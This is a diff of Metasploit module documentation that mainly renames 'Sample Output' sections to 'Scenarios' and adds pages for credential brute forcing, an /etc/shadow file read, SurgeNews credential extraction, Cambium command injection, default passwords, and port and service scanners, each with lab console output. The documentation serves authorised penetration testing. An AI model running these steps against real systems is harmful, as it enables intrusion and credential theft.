msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
USERPASS_FILE => ~/BuildMasterCreds.txt
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```

View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates Google Chromecast via its HTTP interfa
2. Do: ```set RHOSTS [IP]``` 2. Do: ```set RHOSTS [IP]```
3. Do: ```run``` 3. Do: ```run```
## Sample Output ## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) ### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
``` ```
msf > use auxiliary/scanner/http/chromecast_webserver msf > use auxiliary/scanner/http/chromecast_webserver

View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates WiFi access points visible from a Goog
2. Do: ```set RHOSTS [IP]``` 2. Do: ```set RHOSTS [IP]```
3. Do: ```run``` 3. Do: ```run```
## Sample Output ## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) ### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
``` ```
msf > use auxiliary/scanner/http/chromecast_wifi msf > use auxiliary/scanner/http/chromecast_wifi

View File

@ -17,7 +17,7 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862
1. Make sure Cisco Firepower Management console's HTTPS service is running 1. Make sure Cisco Firepower Management console's HTTPS service is running
2. Start ```msfconsole``` 2. Start ```msfconsole```
3. ```use auxiliary/scanner/http/cisco_firepower_login.rb 3. ```use auxiliary/scanner/http/cisco_firepower_login.rb```
4. ```set RHOSTS [IP]``` 4. ```set RHOSTS [IP]```
5. Set credentials 5. Set credentials
6. ```run``` 6. ```run```

View File

@ -34,9 +34,10 @@ You can use any web application to test the crawler.
4. Do: ```set URI [PATH]``` 4. Do: ```set URI [PATH]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
### Example against [WebGoat](https://github.com/WebGoat/WebGoat) ### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
``` ```
msf> use auxiliary/scanner/http/crawler msf> use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST 127.0.0.1 msf auxiliary(crawler) > set RHOST 127.0.0.1

View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands. This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to execute arbitrary system commands:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps ## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/epmp1000_cmd_exec msf > use auxiliary/scanner/http/epmp1000_cmd_exec

View File

@ -1,4 +1,5 @@
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file. This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly.
This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
## Verification Steps ## Verification Steps
@ -7,7 +8,7 @@ This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/epmp1000_dump_config msf > use auxiliary/scanner/http/epmp1000_dump_config

View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to dump system hashes. This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to dump system hashes:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps ## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/epmp1000_dump_hashes msf > use auxiliary/scanner/http/epmp1000_dump_hashes

View File

@ -1,4 +1,5 @@
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly. This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials.
Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
## Verification Steps ## Verification Steps
@ -7,7 +8,7 @@ This module scans for Cambium ePMP 1000 management login portal(s), and attempts
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/epmp1000_web_login msf > use auxiliary/scanner/http/epmp1000_web_login

View File

@ -1,11 +1,13 @@
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration.
A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db.
This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
Vulnerable firmware versions include: Vulnerable firmware versions include:
VMU-C EM prior to firmware Version A11_U05 * VMU-C EM prior to firmware Version A11_U05
VMU-C PV prior to firmware Version A17. * VMU-C PV prior to firmware Version A17.
## Verification Steps ## Verification Steps
@ -14,7 +16,7 @@ VMU-C PV prior to firmware Version A17.
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/gavazzi_em_login_loot msf > use auxiliary/scanner/http/gavazzi_em_login_loot

View File

@ -1,4 +1,5 @@
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal. Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability.
The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases. Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
@ -9,7 +10,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin

View File

@ -11,7 +11,8 @@ This module dumps memory contents using a crafted Range header and affects only
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125 msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125

View File

@ -1,4 +1,5 @@
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method. This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS.
It is typically faster than the traditional form-based OWA login method.
## Verification Steps ## Verification Steps
@ -7,7 +8,7 @@ This module is for password guessing against OWA's EWS service which often expos
3. Set TARGETURI if necessary. 3. Set TARGETURI if necessary.
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf auxiliary(owa_ews_login) > run msf auxiliary(owa_ews_login) > run

View File

@ -0,0 +1,57 @@
This module exploits an authenticated arbitrary file read in the log module's filter engine.
## Vulnerable Application
The application is available for a 90 day evaluation after free registration from
[riverbed](https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html).
Downloads are available for Hyper-V, ESX(i), and KVM. Installation is straight forward, initial login is `admin`/`password`.
If need be from cli, to show the IP address of the device: `show interfaces primary`
This module was successfully tested against:
- SteelHead VCX (VCX255U) 9.6.0a
## Verification Steps
1. Do: ```auxiliary/scanner/http/riverbed_steelhead_vcx_file_read```
2. Do: ```set RHOSTS [IP]```
3. Set TARGETURI if necessary.
3. Set FILE if necessary.
3. Set USERNAME if necessary.
3. Set PASSWORD if necessary.
4. Do: ```run```
## Scenarios
### SteelHead VCX255u 9.6.0a running on ESXi
```
resource (riverbed.rc)> use auxiliary/scanner/http/riverbed_steelhead_vcx_file_read
resource (riverbed.rc)> set rhosts 192.168.2.198
rhosts => 192.168.2.198
resource (riverbed.rc)> set verbose true
verbose => true
resource (riverbed.rc)> run
[*] CSRF Token: 18PK64EKpo4d6y0X5ZOMYJ3fxfYZKfrN
[+] Authenticated Successfully
[+] File Contents:
admin:$6$sKOU5moa$B2szxiSEzq6ZmHZw01CMf64WlzvqIgCYETeXzF1ItxZ5soOJNVXdE2H5N19t0cPeGDf/LGvRymgQHAxgojr6u1:10000:0:99999:7:::
administrator:*:10000:0:99999:7:::
apache:*:10000:0:99999:7:::
localvixuser:*:10000:0:99999:7:::
named:*:10000:0:99999:7:::
nobody:*:10000:0:99999:7:::
ntp:*:10000:0:99999:7:::
pcap:*:10000:0:99999:7:::
postgres:*:10000:0:99999:7:::
rcud:*:10000:0:99999:7:::
root:*:10000:0:99999:7:::
rpc:*:10000:0:99999:7:::
shark:*:10000:0:99999:7:::
sshd:*:10000:0:99999:7:::
statsd:*:10000:0:99999:7:::
webproxy::10000:0:99999:7:::
[+] Stored /etc/shadow to /root/.msf4/loot/20170602230238_default_192.168.2.198_host.file_311580.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -25,7 +25,8 @@ is extremely common.
You can set the test path where the scanner will try to find `robots.txt` file. You can set the test path where the scanner will try to find `robots.txt` file.
Default is `/` Default is `/`
## Sample Output ## Scenarios
``` ```
msf> use auxiliary/scanner/http/robots_txt msf> use auxiliary/scanner/http/robots_txt
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238 msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238

View File

@ -0,0 +1,70 @@
## Description
This module exploits a vulnerability in the WebNews web interface of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated users to download arbitrary files from the software root directory; including the user database, configuration files and log files.
This module extracts the administrator username and password, and the usernames and passwords or password hashes for all users.
## Vulnerable Application
[SurgeNews](http://netwinsite.com/surgenews/) is a high performance, fully threaded, next generation News Server with integrated WebNews interface.
This module has been tested successfully on:
* SurgeNews version 2.0a-13 on Windows 7 SP 1.
* SurgeNews version 2.0a-12 on Ubuntu Linux.
Installers:
* [SurgeNews Installers](http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgenews)
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/scanner/http/surgenews_user_creds`
3. Do: `set rhosts [IP]`
4. Do: `run`
5. You should get credentials
## Scenarios
```
msf > use auxiliary/scanner/http/surgenews_user_creds
msf auxiliary(surgenews_user_creds) > set rhosts 172.16.191.133 172.16.191.166
rhosts => 172.16.191.133 172.16.191.166
msf auxiliary(surgenews_user_creds) > run
[+] Found administrator credentials (admin:admin)
SurgeNews User Credentials
==========================
Username Password Password Hash Admin
-------- -------- ------------- -----
admin admin true
qwerty@bt {ssha}BuFLjIFUUSy1IltX3AuN420qV2ZFU7EL false
user@bt {ssha}HFTkDsnNlLiaHN+sIS9VQarVGGXmYISn false
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.133_surgenews.user.c_633569.txt
[*] Scanned 1 of 2 hosts (50% complete)
[+] Found administrator credentials (test:test)
[+] Found user credentials (zxcv@win-sgbsd5tqutq:zxcv)
SurgeNews User Credentials
==========================
Username Password Password Hash Admin
-------- -------- ------------- -----
asdf@win-sgbsd5tqutq {ssha}8ytixKjxf3kaBc6T471R1Re/C8MUnKnF false
test test true
test@win-sgbsd5tqutq {ssha}Vw8EkFxAJuiZrb98Fz+sdr/yEEmBZ2Jc false
test@win-sgbsd5tqutq {ssha}j4teSf4CgA3+XVRJscFHyqoOQJRoLg4K false
zxcv@win-sgbsd5tqutq zxcv false
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.166_surgenews.user.c_077983.txt
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -9,7 +9,7 @@ The vulnerability is due to insufficient condition checks in the part of the cod
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf auxiliary(cisco_ike_benigncertain) > show options msf auxiliary(cisco_ike_benigncertain) > show options

View File

@ -0,0 +1,30 @@
## Vulnerable Application
Any system exposing the Cisco Smart Install (SMI) protocol, which typically runs on TCP port 4786.
## Verification Steps
1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
3. Do: ```run```
4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
## Scenarios
```
msf auxiliary(cisco_smart_install) > run
[*] Scanned 57 of 512 hosts (11% complete)
[*] Scanned 105 of 512 hosts (20% complete)
[*] Scanned 157 of 512 hosts (30% complete)
[*] Scanned 212 of 512 hosts (41% complete)
[*] Scanned 256 of 512 hosts (50% complete)
[*] Scanned 310 of 512 hosts (60% complete)
[*] Scanned 368 of 512 hosts (71% complete)
[*] Scanned 413 of 512 hosts (80% complete)
[*] Scanned 466 of 512 hosts (91% complete)
[+] a.b.c.d:4786 - Fingerprinted the Cisco Smart Install protocol
[*] Scanned 512 of 512 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,42 @@
## Description
This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
## Vulnerable Application
This module has been tested successfully on:
* [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
* [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
* [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
## Verification Steps
1. Do: `use auxiliary/scanner/nntp/nntp_login`
2. Do: `set RHOSTS [IP]`
3. Do: `set RPORT [IP]`
4. Do: `run`
## Scenarios
```
msf auxiliary(nntp_login) > run
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
[*] Scanned 1 of 2 hosts (50% complete)
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,59 @@
## Description
This module will attempt to initiate a TCP/IP connection with ports on the victim machine. It is this done by sending a SYN packet, and if victim replies with a SYN/ACK packet
that means the port is open. Then the attacker sends a RST packet, and as a result the victim's machine assumes that there is a communication error.
The attacker now knows the state of port without a full tcp connection. Major benefit of TCP SYN scan is that most logging applications do not log the TCP/RST by default.
## Options
**PORTS**
This is the list of TCP ports to test on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**TIMEOUT**
Maximum time to wait for a response. The default value is 500 milliseconds.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were closed.
## Verification Steps
1. Do: `use auxiliary/scanner/portscan/syn`
2. Do: `set RHOSTS [IP]`
3. Do: `set PORTS [PORTS]`
4. Do: `run`
5. If any of the TCP ports were open they will be discovered, status will be printed indicating as such.
## Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.45.159
RHOSTS => 192.168.45.159
msf auxiliary(syn) > set PORTS 1-10000
PORTS => 1-10000
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.45.159:22
[*] TCP OPEN 192.168.45.159:23
[*] TCP OPEN 192.168.45.159:111
[*] TCP OPEN 192.168.45.159:445
[*] TCP OPEN 192.168.45.159:512
[*] TCP OPEN 192.168.45.159:513
[*] TCP OPEN 192.168.45.159:1099
[*] TCP OPEN 192.168.45.159:2121
[*] TCP OPEN 192.168.45.159:3306
[*] TCP OPEN 192.168.45.159:3632
[*] TCP OPEN 192.168.45.159:6000
[*] TCP OPEN 192.168.45.159:6697
[*] TCP OPEN 192.168.45.159:8009
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,71 @@
## Description
This module will enumerate open TCP services by performing a full TCP connect on each port. This will establish a complete three-way handshake (SYN -> SYN/ACK -> ACK) on the target port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
## Vulnerable Application
Any reachable TCP endpoint is a potential target.
## Options
**PORTS**
This is the list of ports to test for TCP Scan on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**ConnectTimeout**
This options states the maximum number of seconds to establish a tcp
connection. Default value if `10`.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were closed.
## Verification Steps
1. Do: ```use auxiliary/scanner/portscan/tcp```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set PORTS [PORTS]```
4. Do: ```run```
## Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.45.159
msf auxiliary(tcp) > set PORTS 1-10000
msf auxiliary(tcp) > run
[*] 192.168.45.159: - 192.168.45.159:25 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:21 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:23 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:22 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:53 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:80 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:111 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:139 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:445 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:513 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:514 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:512 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:1099 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:1524 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:2049 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:2121 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:3306 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:3632 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:5432 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:5900 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6000 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6667 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6697 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8009 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8180 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,91 @@
# Description
This module is used to determine if the ports on target machine are closed. It sends probes containing the FIN, PSH and URG flags. Scan is faster and stealthier compared to some other scans. Following action are performed depending on the state of ports -
#### OPEN|FILTERED Port:
Detects open|filtered port via no response to the segment
#### Closed Port:
Detects a closed port via a RST received in response to the FIN
# Required Permissions
XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
# Options
**PORTS**
This is the list of TCP ports to test on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**Timeout**
This options states the reply read timeout in milliseconds. Default value if `500`.
**RHOSTS**
The target address range is defined in this option.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were not open/filtered.
# Verification Steps
1. Do: `use auxiliary/scanner/portscan/xmas`
2. Do: `set RHOSTS [IP]`
3. Do: `set PORTS [PORTS]`
4. Do: `run`
5. The open/filtered ports will be discovered, status will be printed indicating as such.
# Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/xmas
msf auxiliary(xmas) > set rhosts 192.168.45.159
rhosts => 192.168.45.159
msf auxiliary(xmas) > set ports 1-100
ports => 1-100
msf auxiliary(xmas) > run
[*] TCP OPEN|FILTERED 192.168.45.159:1
[*] TCP OPEN|FILTERED 192.168.45.159:3
[*] TCP OPEN|FILTERED 192.168.45.159:5
[*] TCP OPEN|FILTERED 192.168.45.159:8
[*] TCP OPEN|FILTERED 192.168.45.159:12
[*] TCP OPEN|FILTERED 192.168.45.159:14
[*] TCP OPEN|FILTERED 192.168.45.159:16
[*] TCP OPEN|FILTERED 192.168.45.159:19
[*] TCP OPEN|FILTERED 192.168.45.159:21
[*] TCP OPEN|FILTERED 192.168.45.159:37
[*] TCP OPEN|FILTERED 192.168.45.159:39
[*] TCP OPEN|FILTERED 192.168.45.159:41
[*] TCP OPEN|FILTERED 192.168.45.159:43
[*] TCP OPEN|FILTERED 192.168.45.159:49
[*] TCP OPEN|FILTERED 192.168.45.159:52
[*] TCP OPEN|FILTERED 192.168.45.159:53
[*] TCP OPEN|FILTERED 192.168.45.159:55
[*] TCP OPEN|FILTERED 192.168.45.159:57
[*] TCP OPEN|FILTERED 192.168.45.159:59
[*] TCP OPEN|FILTERED 192.168.45.159:61
[*] TCP OPEN|FILTERED 192.168.45.159:63
[*] TCP OPEN|FILTERED 192.168.45.159:65
[*] TCP OPEN|FILTERED 192.168.45.159:67
[*] TCP OPEN|FILTERED 192.168.45.159:69
[*] TCP OPEN|FILTERED 192.168.45.159:73
[*] TCP OPEN|FILTERED 192.168.45.159:89
[*] TCP OPEN|FILTERED 192.168.45.159:91
[*] TCP OPEN|FILTERED 192.168.45.159:93
[*] TCP OPEN|FILTERED 192.168.45.159:95
[*] TCP OPEN|FILTERED 192.168.45.159:97
[*] TCP OPEN|FILTERED 192.168.45.159:99
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,66 @@
## Vulnerable Application
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
## Verification Steps
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
3. Do: ```run```
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
## Options
There are three options currently supported that control what security protocols to
send in the RDP negotiation request, which can be helpful in identifying RDP
endpoints that might be locked down or configured differently:
**TLS** Set to true to request TLS security support
**CredSSP** Set to true to request CredSSP support
**EarlyUser** Set to true to request Early User Authorization Result PDU support
## Scenarios
```
msf auxiliary(rdp_scanner) > run
[+] 10.4.18.26:3389 - Identified RDP
[+] 10.4.18.22:3389 - Identified RDP
[+] 10.4.18.89:3389 - Identified RDP
[+] 10.4.18.9:3389 - Identified RDP
[+] 10.4.18.67:3389 - Identified RDP
[+] 10.4.18.80:3389 - Identified RDP
[+] 10.4.18.34:3389 - Identified RDP
[+] 10.4.18.70:3389 - Identified RDP
[+] 10.4.18.30:3389 - Identified RDP
[+] 10.4.18.76:3389 - Identified RDP
[+] 10.4.18.13:3389 - Identified RDP
[+] 10.4.18.91:3389 - Identified RDP
[+] 10.4.18.5:3389 - Identified RDP
[+] 10.4.18.47:3389 - Identified RDP
[+] 10.4.18.41:3389 - Identified RDP
[+] 10.4.18.105:3389 - Identified RDP
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 55 of 256 hosts (21% complete)
[+] 10.4.18.118:3389 - Identified RDP
[+] 10.4.18.108:3389 - Identified RDP
[+] 10.4.18.139:3389 - Identified RDP
[*] Scanned 94 of 256 hosts (36% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[+] 10.4.18.157:3389 - Identified RDP
[+] 10.4.18.166:3389 - Identified RDP
[+] 10.4.18.164:3389 - Identified RDP
[+] 10.4.18.170:3389 - Identified RDP
[+] 10.4.18.185:3389 - Identified RDP
[+] 10.4.18.209:3389 - Identified RDP
[+] 10.4.18.188:3389 - Identified RDP
[*] Scanned 156 of 256 hosts (60% complete)
[+] 10.4.18.237:3389 - Identified RDP
[+] 10.4.18.225:3389 - Identified RDP
[*] Scanned 186 of 256 hosts (72% complete)
[*] Scanned 194 of 256 hosts (75% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,55 @@
# Description
This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
```PC NETWORK PROGRAM 1.0
LANMAN1.0
Windows for Workgroups 3.1a
LM1.2X002
LANMAN2.1
NT LM 0.12
```
If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
If the SMB server does not support SMBv1 a RST will be sent.
___
# Usage
The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
#### A host that does support SMBv1.
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS x.x.x.x
RHOSTS => x.x.x.x
msf auxiliary(smb1) > run
[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb1) > services -S x.x.x.x
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
x.x.x.x 445 tcp smb1 open
```
#### A host that does not support SMBv1
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS y.y.y.y
RHOSTS => y.y.y.y
msf auxiliary(smb1) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
___
## Options
The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```.

View File

@ -1,6 +1,8 @@
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information.
This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units. The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication.
The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows: Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows:
@ -16,7 +18,7 @@ snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0
